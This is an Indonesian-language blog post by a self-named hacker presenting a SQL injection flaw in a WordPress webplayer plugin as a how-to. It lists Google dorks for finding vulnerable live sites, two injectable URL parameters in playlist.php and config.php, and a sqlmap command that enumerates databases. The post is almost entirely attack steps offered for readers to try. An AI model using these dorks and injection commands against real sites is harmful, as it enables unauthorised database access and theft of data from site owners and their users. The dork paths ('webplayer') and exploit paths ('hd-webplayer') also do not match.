Wordpress webplayer Plugins SQL Injection Vulnerability tes di Linux


Assalamualaikum Wr.Wb.
dengan diberikan nikmat dan rezeki dari Allah SWT , saya Mr.GagalTotal666 akan share suatu celah pada Wordpress yaitu Wordpress webplayer Plugins SQL Injection Vulnerability tes di BackBox Linux.

ikuti langkah berikut jika anda ingin mencoba :

Dork 1 : inurl:/wp-content/plugins/webplayer/playlist.php?videoid=
Dork 2 : inurl:/wp-content/plugins/webplayer/config.php?id=

Exploit/Poc 1 :
http://127.0.0.1/[PATH]/wp-content/plugins/hd-webplayer/playlist.php?videoid=[SQL]
Exploit/Poc 2 :
http://127.0.0.1/[PATH]/wp-content/plugins/hd-webplayer/config.php?id=[SQL]

Poc SqlMap :
sqlmap -u "http://127.0.0.1/[PATH]/wp-content/plugins/hd-webplayer/playlist.php?videoid=[SQL]" --dbs


kalau anda kurang paham silakan simak video dibawah ini :


mohon maaf bila video masih ada kesalahan dan kekurangan ^_^ saya juga masih belajar
sekian tutorial nya mengenai vlun SQLI pada Wordpress ^_^
semoga bermanfaat ^_^

Wassalamualaikum Wr.Wb.....
Previous
Next Post »